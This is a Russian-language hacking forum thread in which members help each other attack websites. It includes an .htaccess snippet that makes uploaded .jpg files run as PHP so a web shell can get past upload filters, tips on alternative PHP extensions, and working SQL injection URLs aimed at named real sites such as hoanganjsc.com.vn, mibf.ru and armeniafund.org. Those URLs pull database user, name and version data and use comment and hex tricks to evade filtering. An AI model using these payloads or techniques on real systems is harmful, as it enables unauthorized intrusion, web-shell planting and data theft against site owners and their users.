Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    496
    Likes Received:
    533
    Reputations:
    158
    где то я это уже видел ))))

    Попробуй .htaccess, подмену mime-types, .php.ggif, shell.jpg.php

    льешь хтацесс с таким содержимым:
    <Files "shell.jpg">
    RemoveHandler .jpg
    AddType application/x-httpd-php .jpg
    </Files>

    и вслед shell.jpg
     
    #13301 Iceangel_, 1 Jun 2010
    Last edited: 1 Jun 2010
    2 people like this.
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    Iceangel_ спасибо за отзыв, не понял только одно ,какую роль здесь может играть htaccess?
     
    _________________________
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    А я был-бы очень рад, если-бы тут не задавали глупых вопросов, а сначала думали.

    Наверное проверка на расширение для того и сделана, что-бы не возможно было залить то, что нельзя. Или её по Вашему для чего делают?

    Да, если это делал криворукий кодер, то ВОЗМОЖНО! варианты есть, но без кода можно гадать бесконечно долго.
    Вот материал, рекоммендую ознакомится
    http://habrahabr.ru/blogs/php/44610/
     
    2 people like this.
  4. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    С помощью htaccess можно переопределить средства интерпритирования файлов с определенным расширением.
    Например: если в твоем случае есть доступ к файловой системе :) заливаешь туда htaccess (в директорию куда кладутся залитые картинки), который содержит код, предложенный Iceangel_ и льеш свой шелл с расширением jpg. Фильтрацию по расширению обойдешь и шелл будет работать.
     
    1 person likes this.
  5. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    Это лиш в том случае если хтакцесса нет в корне где уже описаны правила обработки интерпретатором...
     
  6. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    30 % что зальёться .htaccess :) Т.к. если он уже php режет, это уже значит фильтрация.

    // o_OPS Теория фильтрации fail. 30 % :)

    И 95 % что сам .htaccess проканает. Т.к. не всегда .htaccess :)

    Да и кто знает, мб там .htaccess лежит :O

    Кстате DSU, IceAngel_ прав, если даже .htaccess в главной сказал мол jpg текст, то он в своей уже удаляет это правило, и создаёт новое.
     
    #13306 Ctacok, 1 Jun 2010
    Last edited: 1 Jun 2010
    1 person likes this.
  7. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    496
    Likes Received:
    533
    Reputations:
    158
    Сомневаюсь. Можно пример такого .htaccess`а ?

    З.Ы.
    Заранее прошу обратить внимание на директиву RemoveHandler в моем примере.
     
    #13307 Iceangel_, 1 Jun 2010
    Last edited: 1 Jun 2010
  8. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    я думаю он имел ввиду, что может не хватить прав на перезапись хтаксеса, если он там уже лежит ;)
     
  9. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    С htaccess-ом конечно интересно, но если php.jpg загрузился, то значит фильтрация по расширению. Скорей всего фильтрация расширений по типу "разрешено все, что не запрещено". Попробуй пихнуть что-то типа php.222 и если прокатит, то пробуй все возможные расширения, которые интерпретируются как php. Например: .php3 .php .phtml .php4 .php5
    Можете че и забыли в фильтре написать.
     
  10. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    Запретный ошибке

    Привет группы;

    Как мы можем получить таблицу с этого сайта, то посмотрим Запретный
    http://www.hoanganjsc.com.vn/product.php?prodid=-90%20union%20select%201,2,3,4,5,6,7,8,9,10,11,1,2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20--
    Вьетнамский сайте
     
  11. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    И откуда ты взял во втором selectе 33 столбца? Для параметра prodid правильный запрос будет
    Code:
    http://www.hoanganjsc.com.vn/product.php?prodid=-90+union+all+select+1,2,3,4--+
     
  12. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    '33' я получил от "order by"
    http://www.hoanganjsc.com.vn/product.php?prodid=90%20order%20by%2034-- <-- Ошибка

    мы можем придать таблице этого сайта, потому что сайт не показал какой-либо номер для инъекций?
     
  13. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    всё он верно сделал. Просто там несколько запросов

    http://www.hoanganjsc.com.vn/product.php?prodid=-90/**/union/**/select/**/1,2,UNHEX(HEX(concat_ws(0x3a,User(),Database(),Version()))),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
     
    1 person likes this.
  14. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    воу, большое!
    поблагодарить Jokester
     
  15. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Вроде бы на прошлой странице уже решили эту проблему или на этом сайте нужно было вывести данные именно в переменной тс?))

    Jokester, зачем эти хексы, анхексы. Всё и так прекрасно выводится. Не в обиду :)

    http://www.hoanganjsc.com.vn/product.php?prodid=-90+union/**/select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
     
    #13315 v1d0qz, 2 Jun 2010
    Last edited: 2 Jun 2010
  16. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    http://www.mibf.ru/index.php?id=23+union+select+0,1,2,3,4,5,6,7,8,9
    pomoqite raskrutit skul
     
  17. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    пока получилась только слепая инъекция:

    http://www.mibf.ru/index.php?id=23+and+substring(version(),1,1)=5--+
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    LokbatanLi
    Если девятое поле не числовое отрабатывает редирект, а потом в урле вывод
    http://www.mibf.ru/index.php?id=-23+union+select+1,2,3,4,5,6,7,version(),null,10/*

    v1d0qz
    Специально поставил хекс\анхекс ибо на въетнамском сайте у него дальше 99% начнутся проблемы с кодировкой, он опять придёт сюда с вопросом, и опять подарит мне "воу, большое!". А зачем мне два больших "воу", сам подумай? Я с одним-то не знаю что теперь делать :(
     
    1 person likes this.
  19. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    http://www.armeniafund.org/press_releases/press_releases.php?id=-234+union+select+0,1,2,3,4,5,6

    version()-4.0.27

    mysql.user-net access

    vot tolko nasel table_name-login nu ne moqu ne kak nayti column_name//

    esli mojno pomoqite pojalusta//

    i pomoymu bil sposob mojno nayti v 4 vetke column_name esli znaem table_name//
    nu ne znayuk kak eto bil i qde 4ital..
    pomoqite..
     
  20. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    а как насчет вывод таблиц (information_schema.tables фильтруется) там тоже фильтруется....
    можно и так

    http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
     
Loading...
Thread Status:
Not open for further replies.